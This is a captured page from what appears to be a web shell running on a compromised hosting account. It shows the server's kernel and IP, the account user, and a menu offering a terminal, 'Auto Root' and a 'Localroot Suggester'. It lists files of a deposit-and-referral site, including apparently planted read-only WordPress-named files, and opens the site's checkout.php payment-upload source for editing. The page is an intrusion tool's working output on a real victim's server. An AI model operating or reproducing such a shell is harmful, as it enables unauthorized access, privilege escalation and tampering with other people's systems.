Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
user /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
AssignmentWorkZone.apk
19.5
MB
-rw-r--r--
2026-03-28 16:09
assignment.php
20.18
KB
-rw-r--r--
2026-03-31 10:04
checkout.php
10.61
KB
-rw-r--r--
2026-03-13 17:01
dashboard.php
10.53
KB
-rw-r--r--
2026-03-31 10:21
history.php
3.6
KB
-rw-r--r--
2026-03-12 12:52
logout.php
91
B
-rw-r--r--
2026-03-11 23:27
pending.php
4.56
KB
-rw-r--r--
2026-03-12 01:29
plan-current.php
2.55
KB
-rw-r--r--
2026-03-11 23:27
profile.php
5.04
KB
-rw-r--r--
2026-03-28 15:45
referral-commissions.php
6.07
KB
-rw-r--r--
2026-03-12 00:37
referral.php
8.61
KB
-rw-r--r--
2026-03-28 15:31
select-plan.php
3.4
KB
-rw-r--r--
2026-03-11 23:27
support.php
12.43
KB
-rw-r--r--
2026-03-12 13:23
team-commission.php
2.82
KB
-rw-r--r--
2026-03-12 12:52
team-details.php
4.46
KB
-rw-r--r--
2026-03-12 15:31
withdraw-history.php
3.53
KB
-rw-r--r--
2026-03-12 12:52
withdraw.php
8.18
KB
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once '../includes/config.php'; if (!isset($_SESSION['user_id'])) { header("Location: ../login.php"); exit; } if (!isset($_GET['plan_id'])) { header("Location: select-plan.php"); exit; } $plan_id = $_GET['plan_id']; $stmt = $pdo->prepare("SELECT * FROM plans WHERE id = ?"); $stmt->execute([$plan_id]); $plan = $stmt->fetch(); if (!$plan) { header("Location: select-plan.php"); exit; } $error = ''; if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['payment_proof'])) { $upload_dir = '../assets/images/proofs/'; if (!is_dir($upload_dir)) { mkdir($upload_dir, 0777, true); } $file_name = $_FILES['payment_proof']['name']; $file_tmp = $_FILES['payment_proof']['tmp_name']; if (!empty($file_name)) { $ext = strtolower(pathinfo($file_name, PATHINFO_EXTENSION)); $allowed = ['jpg', 'jpeg', 'png', 'pdf']; if (in_array($ext, $allowed)) { $new_file_name = "proof_" . time() . "_" . $_SESSION['user_id'] . "." . $ext; $destination = $upload_dir . $new_file_name; if (move_uploaded_file($file_tmp, $destination)) { $stmt = $pdo->prepare("INSERT INTO deposits (user_id, plan_id, status, payment_proof) VALUES (?, ?, 'pending', ?)"); $stmt->execute([$_SESSION['user_id'], $plan_id, $destination]); header("Location: pending.php"); exit; } else { $error_code = $_FILES['payment_proof']['error']; $error = "Failed to upload payment proof. (Error Code: $error_code)"; // Debug if directory is writable if (!is_writable($upload_dir)) { $error .= " - Directory is not writable."; } } } else { $error = "Invalid file type. Allowed: JPG, PNG, PDF."; } } else { $error = "Please upload payment proof."; } } $pm_stmt = $pdo->query("SELECT * FROM payment_methods"); $payment_methods = $pm_stmt->fetchAll(); require_once '../includes/header.php'; ?> <div style="display: flex; min-height: 100vh; align-items: center; justify-content: center; padding: 100px 20px 40px;"> <div class="auth-container" style="max-width: 650px; text-align:center; margin: 0; width: 100%; border-top: 4px solid var(--primary-color);"> <h2 class="auth-title" style="margin-bottom: 5px;">Complete Deposit</h2> <p style="color:var(--text-muted); margin-bottom: 30px;">Follow the instructions below to activate your plan</p> <?php if ($error): ?> <div class="badge badge-danger" style="display:block; margin-bottom:20px; text-align:center; padding:15px; font-size:1rem; border-radius:var(--border-radius);"><i class="fas fa-exclamation-triangle"></i> <?php echo htmlspecialchars($error); ?></div> <?php endif; ?> <!-- Plan Summary Card --> <div style="background: linear-gradient(135deg, rgba(0,210,106,0.1), rgba(0,0,0,0.5)); border: 1px solid rgba(0,210,106,0.2); border-radius: 15px; padding: 25px; margin-bottom: 30px; text-align: center;"> <h4 style="color:var(--text-muted); font-weight: 500; font-size: 0.9rem; text-transform: uppercase; letter-spacing: 1px; margin-bottom: 10px;">Selected Plan</h4> <h3 style="color:#fff; font-size: 1.8rem; margin-bottom: 10px;"><?php echo htmlspecialchars($plan['name']); ?></h3> <div style="font-size: 2.5rem; font-weight: 800; color: var(--primary-color); text-shadow: 0 0 20px rgba(0,210,106,0.3);"> <span style="font-size:1.2rem; vertical-align:middle;">Rs</span><?php echo number_format($plan['price'], 0); ?> </div> <p style="color:var(--text-light); font-size: 0.9rem; margin-top: 15px;"><i class="fas fa-info-circle"></i> Please transfer this exact amount.</p> </div> <div style="text-align: left;"> <h4 style="margin-bottom:20px; font-size: 1.1rem; color: #fff; border-bottom: 1px solid rgba(255,255,255,0.1); padding-bottom: 10px;">Payment Methods available</h4> <?php if (count($payment_methods) > 0): ?> <div style="display:grid; gap:10px; margin-bottom:30px;"> <?php foreach ($payment_methods as $pm): ?> <div class="payment-accordion-item" style="background:var(--bg-dark); border-radius:12px; border:1px solid rgba(255,255,255,0.05); overflow: hidden; transition: 0.3s; box-shadow: 0 5px 15px rgba(0,0,0,0.1);"> <div class="payment-header" onclick="togglePayment(this)" style="padding:18px 20px; display:flex; justify-content: space-between; align-items: center; cursor: pointer; position: relative; transition: background 0.3s;"> <!-- Decorative accent --> <div style="position: absolute; left: 0; top: 0; bottom: 0; width: 4px; background: var(--primary-color);"></div> <strong style="font-size:1.1rem; color:#fff; display:flex; align-items:center; gap:12px; margin-left:8px;"> <i class="fas fa-university" style="color:var(--primary-color); opacity: 0.9; font-size: 1rem;"></i> <?php echo htmlspecialchars($pm['bank_name']); ?> </strong> <i class="fas fa-chevron-down toggle-icon" style="color:var(--text-muted); transition: transform 0.4s cubic-bezier(0.4, 0, 0.2, 1); font-size: 0.9rem;"></i> </div> <div class="payment-content" style="max-height: 0; overflow: hidden; transition: all 0.4s cubic-bezier(0.4, 0, 0.2, 1); padding: 0 20px;"> <div style="display:grid; grid-template-columns: 1fr; gap: 10px; color:var(--text-light); font-size:0.95rem; padding-bottom: 20px; padding-top:5px;"> <div style="background: rgba(255,255,255,0.03); padding: 12px; border-radius: 8px; border: 1px solid rgba(255,255,255,0.02);"> <span style="color:var(--text-muted); font-size: 0.75rem; display:block; margin-bottom: 2px;">Account Title</span> <div style="color:#fff; font-weight:500;"><?php echo htmlspecialchars($pm['account_name']); ?></div> </div> <div style="background: rgba(255,255,255,0.03); padding: 12px; border-radius: 8px; border: 1px solid rgba(255,255,255,0.02);"> <span style="color:var(--text-muted); font-size: 0.75rem; display:block; margin-bottom: 2px;">Account Number</span> <div style="font-weight: 600; color: var(--primary-color); font-family: monospace; letter-spacing: 1px; font-size:1.15rem;"><?php echo htmlspecialchars($pm['account_number']); ?></div> </div> </div> </div> </div> <?php endforeach; ?> </div> <script> function togglePayment(header) { const item = header.parentElement; const content = item.querySelector('.payment-content'); const icon = header.querySelector('.toggle-icon'); // Close all other items document.querySelectorAll('.payment-accordion-item').forEach(otherItem => { if (otherItem !== item && otherItem.classList.contains('active')) { otherItem.classList.remove('active'); otherItem.querySelector('.payment-content').style.maxHeight = '0'; otherItem.querySelector('.toggle-icon').style.transform = 'rotate(0deg)'; otherItem.querySelector('.payment-header').style.background = 'transparent'; } }); const isActive = item.classList.toggle('active'); if (isActive) { content.style.maxHeight = content.scrollHeight + "px"; icon.style.transform = 'rotate(180deg)'; header.style.background = 'rgba(255,255,255,0.02)'; } else { content.style.maxHeight = '0'; icon.style.transform = 'rotate(0deg)'; header.style.background = 'transparent'; } } </script> <?php else: ?> <div class="badge badge-danger" style="display:block; margin-bottom:20px; text-align:center; padding:15px; font-size:1rem; border-radius:var(--border-radius);">No payment methods configured. Please contact support.</div> <?php endif; ?> <form method="POST" action="" enctype="multipart/form-data" style="margin-top: 35px;"> <div class="form-group"> <label style="font-size:1.1rem; color: #fff; border-bottom: 1px solid rgba(255,255,255,0.1); padding-bottom: 10px; display:block; margin-bottom: 15px;">Proof of Payment</label> <div style="background: rgba(0,0,0,0.2); border: 2px dashed rgba(255,255,255,0.15); border-radius: 12px; padding: 30px 20px; text-align: center; transition: 0.3s;" id="upload-area"> <i class="fas fa-cloud-upload-alt" style="font-size: 3rem; color: var(--primary-color); margin-bottom: 15px; opacity: 0.8;"></i> <h5 style="color: #fff; margin-bottom: 5px;">Upload Screenshot or Receipt</h5> <p style="color: var(--text-muted); font-size: 0.85rem; margin-bottom: 15px;">Supported formats: JPG, PNG, PDF (Max 10MB)</p> <!-- File Input Hidden behind styled button --> <input type="file" name="payment_proof" id="payment_proof" class="form-control" accept=".jpg,.jpeg,.png,.pdf" required style="max-width: 300px; margin: 0 auto; background: var(--bg-dark); border: 1px solid rgba(255,255,255,0.1);"> </div> </div> <button type="submit" class="btn-primary" style="width:100%; margin-top:20px; padding: 16px; font-size: 1.1rem; border-radius: 8px; text-transform: uppercase; letter-spacing: 1px; box-shadow: 0 10px 25px rgba(0,210,106,0.3);"> <i class="fas fa-check-circle" style="margin-right: 8px;"></i> Submit Payment for Verification </button> </form> </div> </div> </div> <?php require_once '../includes/footer.php'; ?>